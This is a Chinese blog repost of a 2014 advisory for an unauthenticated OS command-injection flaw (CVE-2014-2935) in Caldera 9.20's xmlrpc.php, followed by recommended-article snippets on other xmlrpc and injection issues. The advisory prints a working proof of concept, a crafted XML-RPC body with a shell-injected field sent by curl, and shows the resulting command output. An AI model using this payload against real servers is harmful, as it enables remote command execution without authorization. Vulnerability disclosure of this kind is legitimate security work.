远程os注入漏洞php,Caldera 'xmlrpc.php'远程命令注入漏洞

最新推荐文章于 2024-08-27 19:32:02 发布
最新推荐文章于 2024-08-27 19:32:02 发布
阅读量232 收藏
点赞数
文章标签: 远程os注入漏洞php

发布日期:2014-05-07

更新日期:2014-05-10

受影响系统:

Caldera Caldera 9.20

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 67252

CVE(CAN) ID: CVE-2014-2935

Caldera是RIP软件、色彩管理软件、工作流软件。

Caldera 9.20及更早版本没有正确删除OS命令内使用的某些元素, '/costview3/xmlrpc_server/xmlrpc.php' 脚本存在命令执行漏洞,未经身份验证的远程用户提交特制的PHP XMLRPC请求即可触发此漏洞,导致执行OS命令。

Markus Wulftange

链接:http://www.kb.cert.org/vuls/id/693092

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Example:

$ cat get_cutter_tools.xml

xmlrpc.get_cutter_tools_xmlrpc

cutter_name

; echo

"<CalderaInfo><methods><item><type>`id`</type></item></methods></CalderaInfo

>"

$ curl --data @get_cutter_tools.xml http:///costview3/xmlrpc_server/xmlrpc.php

get_cutter_tools_xmlrpc

uid=1002(caldera) gid=1001(caldera)

groups=1001(caldera),4(adm),7(lp),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),46(plugdev),103

(fuse),104(scanner),109(netdev)

建议:

--------------------------------------------------------------------------------

厂商补丁:

Caldera

-------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.caldera.com/support/

http://www.caldera.com/product/version-9-20/

http://www.caldera.com/product/options/costview/

0b1331709591d260c1c78e86d0c51c18.png

夏朱
关注
【网络安全】XML-RPC PHP WordPress漏洞
等风来
08-27 480
本文将解释xmlrpc.php WordPress 漏洞及利用方式,并以三种攻击方法进行阐发:1、用户名枚举。2、跨站点端口攻击 (XSPA) 或端口扫描。3、使用 xmlrpc.php 进行暴力攻击。
WordPress xmlrpc.php SSRF漏洞
maverickpig的博客
07-08 1388
网络安全自学日志-漏洞复现篇:WordPress xmlrpc.php SSRF漏洞 本文参考https://blog.csdn.net/god_zzZ/article/details/109991484,为本人复现笔记,如有侵权可联系我删除 该漏洞工作中遇到过 一、漏洞详情 1.1 WordPress xmlrpc.php 存在SSRF漏洞 利用WordPress的xmp-rpc接口,通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程
防止WordPress利用xmlrpc.php进行暴力破解以及DDoS
weixin_34005042的博客
09-18 1006
早在2012 年 12 月 17 日一些采用 PHP 的知名博客程序 WordPress被曝光存在严重的漏洞,该漏洞覆盖WordPress 全部已发布的版本(包括WordPress 3.8.1)。该漏洞的 WordPress 扫描工具也在很多论坛和网站发布出来。工具可以利用 WordPress 漏洞来进行扫描,也可以发起DDoS 攻击。经过测试,漏洞影响存在 xmlrpc.php 文件的全部版本。...
wordpress xmlrpc.php 漏洞,关于WordPress xmlrpc.php Pingback缺陷与SSRF攻击
weixin_29207533的博客
03-10 875
前两天我因为web2hack.org挂了,而分析到原因,当时有些思路,想追踪下去,不过不明确,后来发现WordPress最新版3.5.1出来了,我看到官方说修补了几个安全问题(http://codex.wordpress.org/zh-cn:3.5.1_%E7%89%88%E6%9C%AC),其中有一条引起我的注意:通过Pingback实现的服务器端请求伪造 (Server-side reques...
xmlrpc.php 漏洞修复,CVE-2014-3668,CNNVD-201410-1339|PHP XMLRPC扩展缓冲区溢出漏洞 - 信息安全漏洞门户 VULHUB...
weixin_29055137的博客
03-26 380
PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。XMLRPC是其中的一个用于实现XML-RPC协议的库。 PHP XMLRPC扩展中的libxmlrpc/xmlrpc.c脚本中mkgmtime实现过程中的‘date_from_ISO8...
最新Linux漏洞分析及其解决方案.pdf
09-07
1. Caldera OpenLinux DocView特殊字符过滤漏洞 这是一个输入确认错误,存在于Caldera OpenLinux Server 3.1和Workstation 3.1中。DocView组件通过HTTP接口提供查看man手册的功能,但由于没有充分检查用户输入,远程...
redlock:Redlock算法PHP实现
04-30
使用[SCAN] 命令,Redis> = 2.8 安装(使用作曲家) 您可以在找到packagist中的库。 { " require " : { " everlution/redlock " : " dev-master " } } 文献资料 贡献者 [迈克尔·卡尔德拉(Michael Caldera)]
骨架:CALDERA插件模板
02-20
CALDERA提供了丰富的插件支持,这些插件可以执行特定的任务,如网络扫描、漏洞利用、凭证枚举等。开发者可以通过创建自定义插件来扩展其功能,以适应特定的测试需求。 在CALDERA插件模板中,"plugin-init.py"是一个...
access:一个CALDERA插件
04-28
使用权 插件为CALDERA提供了红队工具和功能,该工具和功能适用于初始访问。
Caldera-Forms, 拖放,响应式的WordPress窗体生成器.zip
10-10
Caldera-Forms, 拖放,响应式的WordPress窗体生成器 caldera窗体 拖动&除去响应表单生成器文档,add-ons &更多信息:更多信息:文档文档add-ons提供/使用这里 repo 等。默认分支是"母版",它应该与 WordPress.org.
WordPress xmlrpc.php 漏洞利用
mingyqf的博客
01-10 1685
原文链接:https://www.jianshu.com/p/42e3b065ad76。
Goby 漏洞发布|Revive Adserver 广告管理系统 adxmlrpc.php 文件远程代码执行漏洞(CVE-2019-5434)
m0_46699477的博客
09-23 768
Revive Adserver是Revive Adserver团队的一套开源的广告管理系统。该系统提供广告投放、广告位管理、数据统计等功能。Revive Adserver 4.2.0之前版本中delivery XML-RPC脚本存在代码问题漏洞,攻击者可执行任意代码获取服务器权限。
Wordpress xmlrpc.php暴力破解漏洞
weixin_33929309的博客
08-02 1174
2019独角兽企业重金招聘Python工程师标准>>> ...
跨站脚本攻击漏洞怎么修复_Caldera 跨站脚本漏洞介绍
weixin_39788703的博客
12-16 298
漏洞介绍Caldera是法国Caldera公司的一套能够为打印机设备提供色彩管理、成像和处理解决方案的软件。Caldera 2.7.0版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。CNNVD编号:CNNVD-202006-1324危害等级:中危CVE编号:CVE-2020-14462漏洞类型:跨站脚本发布时间:2020-06-...
【网络安全】XML-RPC漏洞之盲SSRF
等风来
08-27 553
我收到的响应是这样的,响应体中的状态为0,表示请求已成功发送:
网站被注入js代码_GeForce Experience OS 命令注入
weixin_39695306的博客
11-29 237
译文声明本文是翻译文章,文章原作者rhinosecuritylabs,文章来源:http://rhinosecuritylabs.com 原文地址:https://rhinosecuritylabs.com/application-security/nvidia-rce-cve-2019-5678/译文仅供参考,具体内容表达以及含义原文为准×0x01 漏洞概述在这篇文章中,我将分享我是如何发现可利...
远程线程注射dll
weixin_33953249的博客
12-01 99
//注射void CInjectDlg::OnButtonInject(){ int nPid=0; WCHAR szDllPath[MAX_PATH]={0}; int nDllNameSize=0; //获取选择的进程PID nPid=m_CtrCboProcess.GetUserChoosePid(); if (nPid&lt;8) ...
Kali 2022.2 安装 CALDERA如何重新克隆代码库
最新发布
09-12
在Kali Linux 2022.2安装CALDERA时,如果需要重新克隆其代码库,你需要按照以下步骤操作: 1. **打开终端**:首先,通过快捷键`Ctrl + Alt + T`或者在应用菜单搜索终端(Terminal)。 2. **切换到caldera目录**:如果你之前已经安装过CALDERA并有一个工作目录,输入以下命令进入那个目录: ``` cd /path/to/caldera_directory (如果已知路径) ``` 3. **删除旧仓库**:如果想清空并重新初始化Git仓库,可以使用`git clean -fdx`命令(注意这个操作会删除所有未追踪的文件和提交历史)。 4. **克隆官方仓库**:然后,使用`git clone`命令从GitHub或其他源克隆最新的CALDERA代码: ``` git clone https://github.com/mitre/caldera.git (默认的GitHub地址) ``` 或者替换为其他指定的仓库URL,如GitLab、Bitbucket等。 5. **切换分支或拉取更新**:如果你想获取特定版本或最新更改,可以切换到所需的分支: ``` git checkout <branch_name> git pull origin <branch_name> ``` 6. **初始化并设置**:完成克隆后,确认`.gitignore`和其他配置文件是否正常,如有必要,运行`git init` 初始化新的Git项目。 7. **检查安装**:最后,检查是否成功安装,你可以运行`caldera --version`查看版本信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值